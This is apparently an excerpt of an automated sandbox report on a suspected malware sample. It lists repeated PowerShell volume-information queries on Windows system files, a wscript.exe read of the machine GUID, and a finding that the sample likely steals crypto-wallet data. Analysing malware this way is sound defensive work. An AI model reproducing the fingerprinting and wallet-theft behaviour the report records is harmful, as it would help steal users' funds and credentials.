        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Found many strings related to Crypto-Wallets (likely being stolen)
